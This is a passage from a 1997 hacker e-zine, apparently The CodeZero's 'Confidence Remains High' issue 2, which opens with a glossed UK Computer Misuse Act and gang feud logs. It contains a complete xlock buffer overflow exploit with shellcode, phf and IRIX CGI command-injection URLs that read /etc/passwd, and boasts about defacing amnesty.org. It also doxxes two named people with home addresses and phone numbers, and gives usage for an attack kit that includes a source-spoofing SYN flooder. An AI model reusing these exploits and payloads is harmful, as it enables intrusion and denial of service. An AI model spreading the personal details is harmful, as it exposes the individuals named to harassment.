lesser works...Partially edited by me, the original can be now found at www.sinnerz.com/bible.htm - T_K Hey, this is an interesting little read. Please note it still can be quite interesting even if you don't like in UK - Darkfool. The 1990 Computer Misuse Act - UK --------------------------------- In plain English. ----------------- "An Act to make provision for securing computer material against unauthorised access or modification; and for connected purposes" { This is the long title (header) of the Act and confirms what the act does and applies to. } SECTION 1 Unauthorised access to computer material -------------------------------------------------- TEXT: A person is guilty of an offence if he causes a computer to perform any function with intent to secure access to any program or data held in any computer. { This means that if you can get access to files which you shouldn't be allowed to retrieve or read then you are committing a offence, this only applies if the person in question has intent ( meaning they are doing it on purpose, often referred to as hacking ) to carry this out. } A person is guilty of an Offence if the access he intends to secure is unauthorised; and he knows at the time when he causes the computer to perform the function that that is the case. { This means that the person is guilty doesn't have authorisation to secure access to files then he is committing an offence. The person is not guilty if he/she doesn't know what they are trying to perform. This applies to everything i.e. any program, a program or data of any particular kind and a program or data held } A person guilty of an offence under this section shall be liable on summary conviction to imprisonment for a term not exceeding six months or to a fine not exceeding level 5 on the standard scale or to both. { Meaning, you could go to prison for 6 months for committing an offence mentioned above ! You could also be subject to a fine @ level 5, which is always changing. You have to be convicted of the crime first though ;) } SECTION 2 Unauthorised access with intent to commit or facilitate ----------------------------------------------------------------- commission of further offences ------------------------------ A person is guilty of an offence under this section if he commits an offence under section 1 above. To commit an offence to which this section applies or to facilitate the commission of such an offence ( whether by himself or by any other person) and the offence he intends to commit or facilitate is referred to below in this section as the further offence. { This meaning that what is mentioned in section 2 applies to the person gaining unauthorised access to a computer system and to anyone who facilitates such a person } This section applies to offences for which a person of twenty-one years of age or over ( not previously convicted ) may be sentenced to imprisonment for a term of five years. { This means that if you re-offend or facilitate to re-offend and have been convicted you are liable to 5 years imprisonment or/and a large fine } SECTION 3 Unauthorised modification of computer material -------------------------------------------------------- A person is guilty of an offence if he/she does any act that causes an unauthorised modification of the contents of any computer; and at the time when he does the act he has the requisite intent and the requisite knowledge. { This means that if a person modifies computer material which he/she is not authorised to do he/she is guilty of committing an offence, however, the person must have the intent to carry out this crime else the person is not liable } { This next bit is the interesting bit } For the purposes of the above section the requisite knowledge is an intent to cause a modification of the contents of any computer and by so doing to impair the operation of any computer; to prevent or hinder access to any program or data held in any computer; to impair the operation of any such program or the reliability of any such data. The intent need not be directed at any particular computer; any particular program or data or a program or data of any particular kind; or any particular modification. { This basically means, if you have the intent and knowledge of breaking into computers, without have to actually do it you can be liable to an offence. } For the purposes of the Criminal Damage Act 1971 a modification of the contents of a computer shall not be regarded as damaging any computer or computer storage medium unless its effect on that computer storage medium, impairs its physical condition. { Meaning that you cannot be prosecuted for criminal damage whilst hacking into a machine unless you cause physical damage i.e. on site hacking, then taking a sledge hammer to the computer can be classed as criminal damage but change the password for root login is not criminal damage, unless you send the computer into high speed self destruct mode and ruin one of the heads on the 50 gig duke box ? } { A lot of the next part of the document is about jurisdiction and some technical mumbo jumbo } SECTION 14 Search warrants for offences under section 1 ------------------------------------------------------- Where a circuit judge is satisfied by information on oath given by a constable that there are reasonable grounds for believing that an offence under section 1 above has been or is about to be committed in any premises; and that evidence that such an offence has been or is about to be committed is in those premises he/she may issue a warrant authorising a constable to enter and search the premises, using such reasonable force as is necessary. { This basically means that if they believe that you have the intent or have broken into a system your not supposed to ( section 1 ) they can come around your house and knock your door in, or, open it for them nicely. } SECTION 15 Extradition where Schedule 1 to the Extradition Act 1989 applies --------------------------------------------------------------------------- The offences to which an order in council under section 2 of the extradition act 1870 can apply shall include offences under sections 2 and 3 and any conspiracy to commit such an offence and any attempt to commit an offence under section 3. { This meaning, that if you have a conspiracy to break into a system you can be extradited } In the UK it can be illegal to posses anything which may show an intent to hack, such as hacking documents. So, if your out there and in UK and didn't know that you were doing is most probably illegal then keep your head down ! 6. so1o Gets Busted By CERT : so1o I've been busted by CERT?!@# umm, okay...whatever you say Hostile you fucken pussy! and a cl000less one at that!@# Speadin' shit about stuff you dont know : [20:57] dude!! wassup? [20:59] so1o got busted by CERT! lol [21:00] yup [21:00] they have logs of him on over 80 computers [21:01] thats all i know is like what i just got forwarded to me [21:03] they got logs from when he used phfscan.c [21:03] and other shit any more info on so1o shit ? [21:06] l [21:06] Dear Sir. [21:06] We have now traced down the responsible account behind this attempt and=20 [21:06] have taken action against it. [21:06] If you would like to know who is behond this you should either file a=20 [21:06] report to the propper authoroties or fax pege Gustagsson at +++ 46 8=20 [21:06] 7132657 and ask him to trace this down in the phone network. [21:06] If you got any more question feel free to get back to me.. or if you=20 [21:06] think that this is to be considered as closed. [21:06] check this now [21:06] __ ____ Telia Internet=20 [21:06] / /_/ / Incident Response Team [21:06] / / \ / IRT@TELIA.NET [21:06] =09 FAX ++46 - 8 456 8935=20 [21:06] On Fri, 2 May 1997, m0dify wrote: [21:06] > That is the log from our www.usda.gov web server.... CERT also said that [21:06] > this log is on 80 computers since 4/1/97 . There was also a log on [21:06] > the 17th of April. =20 [21:07] > > Dear Sir. [21:08] > > This messages dropped down on my desk today. [21:08] > > I need a time to know who was on that dial up and so whe could hunt [21:08] > > him/her down in the phone network.. [21:08] heh... so1o fuct up it seems.. he's toast. [21:10] im glad to man... amnesty was just so uncool when he did that h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# I've seen one of those logs that Modify had (now CERT have them too) and, I'm sooooo dissapointed to say... -I- -D-I-D-N-'-T -P-H-F- -T-H-O-S-E- S-I-T-E-S- Let us look at the facts...Those that Hostile and his little lameassfuck sIn wannabe haqr posse didn't even see : ------------------------------------------------------------------------------- THE FACTS : ------------------------------------------------------------------------------- CERT logs show that the phf queries to approximatley 80 sites on the same day that the www.amnesty.org page was changed show that this technique was used..which is fundementally incorrect, here is the phf query string found in the logs, the fact that this was on the same day as amnesty is the ONLY factor linking me to these events : GET /cgi-bin/phf?qalias=X%0Acat%20/etc/passwd (I think there's also a "3D" somewhere in there too..) And here is the phf query code set down by every text I have ever read AND in phfscan.c which I would use if I ever wanted to scan such sites for the phf hole : GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd I think we can all see a slight difference, which basically says "IT'S NOT MY FUCKING STYLE! ONLY A LUNA-FUCKING-TICK would even think about using that technique. Seeing it probably wouldn't work anyway." The next point is the IP from where the queries originate, it is *.telia.com which I have been told is a SWEDISH ISP now, do I live in Sweden? NO!! Do I have any shells at dynamic IP's IN SWEDEN? NO!! There is no plausible way I could have run such a scan. Unless I dial long distance, which isn't gonna happen. One last point, I knew that we "0wned" amnesty.org from about 2 weeks before we actually decided to change the index.html, because when my friends broke in the first time, they had set up a .rhosts file and a suid root shell in something like /tmp/.... But when they left the system and tried to regain access, they found that the admin had removed the account or changed the login and pass, so we decided to leave the site for about a week and a half, until we started to try and formulate a way to get back in, in this period we did NO phf scanning whatsoever. And on the weekend when we did get back in, using an ingenious method that I was never told about, by a new hacker to our team, modeX, we decided to at least do something to prove we had regained access, so I designed a new index.html, to which the team uploaded. That was all that happened, and therefore the phf scans can IN NO WAY be related to the amnesty.org attack as we owned that system A LONG TIME before, and it was only a matter of regaining access, one last point being that we didn't walk through the amnesty "front door" as it were, as I was told we stumbled over a trusted host, shell.oil.ca or something like that. Anyway, thats just a few points I would like to raise in proving that sIn are again VERY CL000LESS fucks who know absolutely NOTHING about hacking or "the scene" in any way shape or form...And as for the Incident Response Team, they are most probably looking for some lamefuck Swedish haqr. Any-Fucking-Way, what the fuck they gonna do when they find this haqr?!@ arrest him for phf'ing 80 sites? h0h0h0, I wouldn't call that much of a bust :) "Listen sonny! you're gonna get 10 years for connecting to port 80 and typing "GET /cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd" becuase thats not against ANY law and CERT owns us all. so1o. There are alot of missing pieces, and alot of the data I base my argument on originated from m0dify (see the letter to IRT@TELIA.NET earlier) so I think I have more of an idea than Hostile the cl00less lame gimpfuck wannabe haqr. 7. CERT Advisory CA-97.13 : xlock vunerablity : Taken From Bugtraq Topic: Vulnerability in xlock ------------------------------------------------------------------------------- The CERT Coordination Center has received reports that a buffer overflow condition exists in some implementations of xlock. This vulnerability makes it possible for local users (users with access to an account on the system) to execute arbitrary programs as a privileged user. Exploitation information involving this vulnerability has been made publicly available. If your system is vulnerable, the CERT/CC team recommends installing a patch from your vendor. If you are not certain whether your system is vulnerable or if you know that your system is vulnerable and you cannot add a patch immediately, we urge you to apply the workaround described in Section III.B. We will update this advisory as we receive additional information. Please check our advisory files regularly for updates that relate to your site. ------------------------------------------------------------------------------- I. Description xlock is a program that allows a user to "lock" an X terminal. A buffer overflow condition exists in some implementations of xlock. It is possible attain unauthorized access to a system by engineering a particular environment and calling a vulnerable version of xlock that has setuid or setgid bits set. Information about vulnerable versions must be obtained from vendors. Some vendor information can be found in Appendix A of this advisory. Exploitation information involving this vulnerability has been made publicly available. Note that this problem is different from that discussed in CERT Advisory CA-97.11.libXt. II. Impact Local users are able to execute arbitrary programs as a privileged user without authorization. III. Solution Install a patch from your vendor as described in Solution A. If you are not certain whether your system is vulnerable or if you know that your system is vulnerable and you cannot install a patch immediately, we recommend Solution B. A. Obtain and install a patch for this problem. Below is a list of vendors who have provided information about xlock. Details are in Appendix A of this advisory; we will update the appendix as we receive more information. If your vendor's name is not on this list, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Berkeley Software Design, Inc. (BSDI) Cray Research - A Silicon Graphics Company Data General Corporation Digital Equipment Corporation FreeBSD, Inc. Hewlett-Packard Company IBM Corporation LINUX NEC Corporation The Open Group [This group distributes the publicly available software that was formerly distributed by X Consortium] Solbourne Sun Microsystems, Inc. B. We recommend the following workaround if you are not certain whether your system is vulnerable or if you know that your system is vulnerable and you cannot install a patch immediately. 1. Find and disable any copies of xlock that exist on your system and that have the setuid or setgid bits set. 2. Install a version of xlock known to be immune to this vulnerablility. One such supported tool is xlockmore. The latest version of this tool is 4.02, and you should ensure that this is the version you are using. This utility can be obtained from the following site: ftp://ftp.x.org/contrib/applications/xlockmore-4.02.tar.gz MD5 (xlockmore-4.02.tar.gz) = c158e6b4b99b3cff4b52b39219dbfe0e You can also obtain this version from mirror sites. A list of these sites will be displayed if you are not able to access the above archive due to load. ........................................................................... Appendix A - Vendor Information Below is a list of the vendors who have provided information for this advisory. We will update this appendix as we receive additional information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact the vendor directly. Berkeley Software Design, Inc. (BSDI) ===================================== BSD/OS is not vulnerable to the problem in xlock since our xlock is not setuid. Cray Research - A Silicon Graphics Company ========================================== Cray Research does not include xlock in its X Window releases, so we are not at risk on the xlock buffer overflow problem. Data General Corporation ======================== The xlock sources (xlockmore-3.7) that DG includes in its contributed software package have been modified to remove this vulnerability. These will be available when release 8 comes out. We also recommend that our customers who have the current version should change the sprintf calls in resource.c to snprintf calls, rebuild and reinstall the package. Digital Equipment Corporation ============================= This reported problem is not present for Digital's ULTRIX or Digital UNIX Operating Systems Software. FreeBSD, Inc. ============= The xlockmore version we ship in our ports collection is vulnerable in all shipped releases. The port in FreeBSD-current is fixed. Solution is to install the latest xlockmore version (4.02). Hewlett-Packard Company ======================= We ship an suid root program vuelock that is based on xlock. It does have the vulnerability. The only workaround is to remove the executable, the patch is "in process". IBM Corporation =============== AIX is vulnerable to the conditions described in this advisory. The following APARs will be released soon: AIX 3.2: APAR IX68189 AIX 4.1: APAR IX68190 AIX 4.2: APAR IX68191 IBM and AIX are registered trademarks of International Business Machines Corporation. LINUX ===== Red Hat: Not vulnerable Caldera: Not vulnerable Debian: An updated package is on the Debian site SuSE: ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/S.u.S.E.-4.4.1/xap1/xlock And in general the new Xlockmore release fixes the problems. NEC Corporation =============== UX/4800 Not vulnerable for all versions. EWS-UX/V(Rel4.2MP) Not vulnerable for all versions. EWS-UX/V(Rel4.2) Not vulnerable for all versions. UP-UX/V(Rel4.2MP) Not vulnerable for all versions. The Open Group ============== Publicly available software that was formerly distributed by the X Consortium - Not vulnerable. Solbourne ========= Solbourne is not vulnerable to this attack. Sun Microsystems, Inc. ====================== We are producing patches for OpenWindows 3.0 for Sun OS versions 4.1.3_U1, 4.1.4, 5.3, 5.4, 5.5, and 5.5.1. ------------------------------------------------------------------------------- The CERT Coordination Center thanks David Hedley for reporting the original problem and Kaleb Keithley at The Open Group for his support in the development of this advisory. ------------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in the Forum of Incident Response and Security Teams (see http://www.first.org/team-info/). CERT/CC Contact Information ------------------------------ Email cert@cert.org Phone +1 412-268-7090 (24-hour hotline) CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4) and are on call for emergencies during other hours. Fax +1 412-268-6989 Postal address CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 USA Using encryption We strongly urge you to encrypt sensitive information sent by email. We can support a shared DES key or PGP. Contact the CERT/CC for more information. Location of CERT PGP key ftp://info.cert.org/pub/CERT_PGP.key Getting security information CERT publications and other security information are available from http://www.cert.org/ ftp://info.cert.org/pub/ CERT advisories and bulletins are also posted on the USENET newsgroup comp.security.announce To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org In the subject line, type SUBSCRIBE your-email-address ------------------------------------------------------------------------------- * Registered U.S. Patent and Trademark Office. Copyright 1997 Carnegie Mellon University This material may be reproduced and distributed without permission provided it is used for noncommercial purposes and the copyright statement is included. The CERT Coordination Center is part of the Software Engineering Institute (SEI). The SEI is sponsored by the U.S. Department of Defense. ------------------------------------------------------------------------------- This file: ftp://info.cert.org/pub/cert_advisories/CA-97.13.xlock http://www.cert.org click on "CERT Advisories" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Revision history -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM3DOFnVP+x0t4w7BAQH9MwQAwULlCDTqDbW+CiS0/Z36BtGf6Eqzx43B pEt72rQlQbw2AqRnHeq85dzVUB4eKmL0T//bGYyo0sCt+8nlFaS3cNYh0cyl3jdu JPDVoNhWB7v2+8nHvAEDz2UdomNVaxXDFvAbZ9JvEk/Ex6aFiXtl4qXdjxtcC4ze kGKLcu0+LzE= =nF5B -----END PGP SIGNATURE----- ------------------------------------------------------------------------------ The Exploit Code - not in the *ORIGINAL* CERT advisory ;] : ------------------------------------------------------------------------------ /* x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); } 8. IRiX WWW Server Bugs : Tetsu Khan Number 1 : ---------- http://www.site.com/cgi-bin/wrap?/etc ...Lets you view the contents of the /etc/ directory, you can try others too.. Number 2 : ---------- http://www.site.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd ...Lets you view the /etc/passwd file, also try /etc/hosts to make sure the cgi script isn't a trap. You can also execute some kind of remote shell using webdist technique, but we are looking into it now... 9. Hacking Not-So-Electrical Items : Tetsu Khan y0h CrEw!@# T0daY wE WiLL LeArN tEw Hax0r.... TrEES!!! tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!! YePpO! TrEEs! LiKe Da oNeZ j00 FiNd In YeR GaRdEn SoMeTiMeS!! oKaY, HeRe aRe THe k-LEeTo JuaReZ YeW wILL nEEd... 1 : A HaCk SaW 2 : CoMoFlAgUeD CLoThiNG 3 : a CoPPeR NaiL 4 : A hAmmER 5 : a GI-JoE AcTiOn FiGuRe (WiTH pArAChUte) 6 : a SmALL, wELL TrAiNeD InSecT, LiKe A bEE 7 : oNe LaPtOp ComPUtEr (wIv d0S 2.4 *OnLy*) 8 : OnE RS232 CaBlE OkAy CrEw! ThIs iS Da mAsTA PlAn!@# FiRsTly, aS WiTH mANy OtHer HaCks YoU WiLL nEEd tO ScAn Da PoRts Of ThE TrEE, dO ThIs By UsIng tHE SmALL, wELL TrAiNeD InSecT, LiKe A bEE, aS bEE's aRe ThE BeSt At SCannInG HiDDen PoRtz, WhEn ThE bEE HaS fOuND sOmE kEwL PoRtS (UsuALLy aT dA tOp oF Da TrEE) tIe ThE GI-JoE AcTiOn FiGuRe tO ThE bEE, aNd gEt HiM To PuT YeR Rs232 CaBle Up ThErE sO YeW CaN AcCesS dA PoRt Of Da TrEE! WhEn ThE rS232 cAbLE iS In pLACe, PuT oN ThE CaMofLAUgEd CloTHIng, AnD HiDe BeHiNd A bUsH WiTh YoUr LaPtOP, ThEn GeT ThE GI-JoE AcTiOn FiGuRe To PaRAcHute d0Wn dA TrEE, aNd GiVe YoU ThE OTheR EnD Of dA Rs232 CaBLe, ThEn gO InTo DoS AnD RuN tHiS PrOgRam In Gw-BASiC... 10 OPEN (COM PORT AND STUFF) 20 DATA "GIVE ME ALL YOUR K-LEET JUAREZ AND STUFF NOW, BECAUSE I OWN J00" 30 OPEN (ANOTHER PORT AND STUFF) 40 DATA "EYE BE W00PIN J00 F00L, PHEAR MUH ELEETNESS" 50 GOTO 10 ThIs ShOuLd cRaSh ThE TrEE, LeAvInG iT OpEn tO AtTaCk, NeXt TaKE ThE HaCk SaW AnD StArT cUtTiNg The BaRK oFF ThE TrEE (OnLy iN oNe pLaCe) ThE BArk AcTs LiKe a FiRewALL, AnD sO It MuSt Be tAkeN DoWN FirSt. NeXt CHecK On YoUr LaPtOp WheThEr ThE TrEE HaS GiVen yEw eLeeT JuArEz, iF NoT ThEN uSe The CoPPeR nAiL to rm -rf / ThE TrEE, HaMmEr The CoPPeR nAiL InTo The TrEE, AnD ThE TrEE WiLL bE rm'd WitHiN aBOUt A wEEk (dEw TeW 99999999999999 GB HaRd dRivE SPaCe) hAvE PhUn! MoRe NoT-So-LeCtiCaL iTeMz NeXt TimE!@~^&* TeEkAy. =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== 1. Amnesty International Hacked : Article From cnet.com http://www.news.com/News/Item/0,4,10135,00.html Amnesty International hacked By Janet Kornblum April 28, 1997, 3:15 p.m. PT Hackers broke into the Amnesty International home page over the weekend, altering it with a highly stylized, futuristic-looking graphic of a small child or baby smoking a cigarette. Amnesty International didn't know what the perpetrators wanted to accomplish with the hacking, which was strikingly apolitical considering the political nature of the target. Above the picture, the altered Web page read, "Who laughs last? We are the 4 man dream team, just proving one of many points." But just what those points were was lost on many, not the least of whom was Mike Blackstock, the system administrator for Ontario Internet Link, the small Canadian Internet service provider that hosts the Amnesty site for free. "As far as I can tell, they didn't do anything malicious," he said. "They replaced one page of Amnesty with a silly graphic of a kid smoking. This was not political as far as I could tell. The only politics I could think of was cigarettes." Beneath the picture, the page is signed, "Thanx to: so1o, modeX, XFli, mstrhelix...CodeZero uber alles!" This hack appears to be unrelated to other recent high-profile incidents, including one last week in which a Portuguese group broke in to Indonesian government Web pages to protest its treatment of East Timor. In that case, the hackers--referred to by many as "crackers" because they crack into systems--were quite clear about the reasons behind their action. In the case of the Amnesty page, Blackstone said the hackers only altered the Web page and did not cause major damage, though they could have done so if they wanted to. The altered page was up for a few hours, he said. Blackstone was busy plugging the security hole but pointed out that sites much bigger with higher profiles, such as the Air Force, the Central Intelligence Agency, and the Justice Department, also have been hacked. 2. //sToRm// Of sIn Rips Port Pro : so1o Ummmm, on www.sinnerz.com //sToRm// has a lamefuck page with his k-leet w1nd0ze '95 juarez, coded in Visual Basic, with his "VB For Dummies" book, which include... DrSpewfy : Pile'O'Crap, why not get a nameserver and sirc? and actually be able to talk to people? DCCNewk : Chargen Flood? why not try like, SYN FLOOD? d0h.. Port Pro : Okay, original Port Pro is SHAREWARE, made by Blue Byte Software, and it is SOOO obvious that //sToRm// just did a little bit of hex editing, and B00oo00m! hes changed the authors name and shit to his own! but ummm, because of his EXTREME lameness, he didn't know how to change the program name, the version and the general interface and look of the program, what a LAME FUCK. I'm sure he will have Blue Byte on his fucking ass with Copyright and shit. h0h0h0h0h0!@# I doubt //sToRm// coded *ANYTHING* on that page, as DrSpewfy is just shit, and DCCNewk is just like the DCC Nuking code we put out in the CodeZero Technical Journal Issue 2 :) 3. Digital Darkness Lives : so1o It looked as if the DD wouldn't bring out a magazine this month, but they got a huge influx of submissions and live another day!@# if you want to submit anything for DD, mail spamman@erols.com or spaman@erols.com 'cos I ain't shure. Visit their page too : http://dd.home.ml.org 4. /home/sdr 0wned : so1o sdr, a user of duncan.nac.net (owned by bspline - where all the cool people on efnet have their shells) was playing with the permissions in his home directory and he accidentally made the whole directory world readable, so then cold blood and others got all of sdr's k-leet y00nix juarez, and tar'd + gz'd them up and were distributing the sdr.tar.gz in #hack using XDCC :) 5. Sendmail 8.8.4 Remote Is Out : so1o Yep, its been confirmed, the sendmail 884 remote exploit for ALL OS's is now out, there was some delay in r00t members getting the offsets needed for each Operating System, but now the technique is complete, and many 8.8.4 systems are vunerable. Sendmail 8.8.5 remote exploits are being looked into now. 6. sIn inf0z Part 2 : The CodeZero ------------------------------------------------------------------------------- =-= w0wie!@# we g0t 2 n0w!! =-= ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- aS wE PrOMiSeD LasT t1me! eXpect m0re s00n! =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/05/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ w00 w00!! Now you can have k-leet skills like me! Firstly upload the crak.tar to a linux 2.0.x system, or to your own, then tar -xvf crack.tar to unzip the file, then move the files around and shit if you want to, then you're ready to go! Expect OS specific kits in later issues...And Multi-Scan s00n. =============================================================================== The Contents Of The Kit : =============================================================================== dnsscan : Mass DNS query program, gets lists of systems in entire countries, or all the systems on a network, like *.microsoft.com. phpscan : Scans hosts from a file and outputs a list of php vunerable sites. phpget : Gets files from php vunerable servers. phfscan : Scans hosts from a file and outputs a list of php vunerable sites. ident-scan: Scans all daemons running on ports and determines cool stuff. tcpprobe : Very simple portscanner. fingah : Uses an apache hole to finger systems if port 79 isnt open. synk4 : SYN flooder, basically kicks the shit out of systems. =============================================================================== Usages : =============================================================================== Use this command to unzip the crak.tar... % tar -xvf crak.tar then it will be copied into /crak, depending on the working directory.. DNSscan : --------- Usage: dnscan [-file ] [-domain ] [-sub ] -file Usages as a list of subdomains and servers to scan. -domain Lists all servers in a first level domain like com or net. -subdomain Lists all servers in a domain. The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. The input file needs to have the following format: [] To list all servers in Japan, do "dnscan -domain jp" To list all servers in the netcom domain, do "dnscan -sub netcom.com" PHPscan : --------- phpscan eg. phpscan domains.txt phpvunerable.txt PHPget : -------- phpget eg. phpget www.p1.com /etc/passwd PHFscan : --------- phfscan eg. phfscan domains.txt phfvunerable.txt Ident-Scan : ------------ ident-scan [low port] [high port] eg. ident-scan warped.arc.nasa.gov 1 9999 TCPprobe : ---------- tcpprobe eg. tcpprobe microsoft.com Fingah : -------- fingah eg. fingah www.p1.com root Synk4 : ------- synk4 if you use 0 as the source address, its puts the syn flooder into random ip mode, where the packets are sent from many different random sites. eg. synk4 0 fucked.com 1 23 Have Phun!@# =============================================================================== Where To Get CRAK.tar : Under CodeZero Linux Tools Section on www.codez.com =============================================================================== It can be unzipped with WinZip if you are in W1nd0ze too.. :) =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== Well, that was issue 2, hope ya'll liked it, don't forget to visit... AnD ReMeMBer To LiNk To iT FrOm YouR SiTeZ!! =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== =====================> http://www.codez.com NOW UP!@#* <===================== Until next time, when there will be 900 days until the year 2000... The CodeZero. =============================================================================== =====================> http://www.codez.com NOW UP!@#* <===================== =============================================================================== Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#* crh003.txt100644 1751 12 324153 6355575606 10324 0ustar wheel .oO The CodeZero Oo. .oO Presents Oo. ۲۲۲۲۲۲۲۲۲۲۲ ۲ -C-O-N-F-i-D-E-N-C-E- -R-E-M-A-i-N-S- ۲ ۲ ۲ ۲۲ ۲۲ ۲ ۲ ۲ Issue 003, July 15th 1997. ۲ ۲ ۲۲۲۲۲۲۲۲۲۲۲ Are you on a w1nd0ze / D0s system? We suggest you view this in EDIT.COM For added AsKii effects!@# _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@" ---------------------------------- -- HTTP://WWW.CODEZ.COM -- ---------------------------------- In This "Added Vitamins And Minerals" Issue : -----=> Section A : Introduction And Cover Story. 1. Confidence Remains High Issue 3....................: Tetsu Khan 2. The Future.........................................: so1o -----=> Section B : Exploits And Code. 1. crontab b00gz......................................: unknown 2. DoS : superforker.c................................: Vio 3. Cool Bot Juarez : personal.tcl.....................: Scorn 4. imapd Remote Exploit...............................: aky / p1 5. Solaris 2.5.1 ps Exploit...........................: J. Zbiciak 6. handler CGI Hole...................................: so1o -----=> Section C : Phones / Scanning / Radio. 1. DTMF Decoder.......................................: xFli 2. Dealing With Directory Assistance Operators........: Qytpo 3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik -----=> Section D : Miscellaneous. 1. More sIn inf0z.....................................: The CodeZero + Friends 2. The Codez That NASA Use............................: so1o 3. Rooting From Bin...................................: so1o 4. DNS Spoofing.......................................: so1o 5. FreeNet............................................: TrN 6. 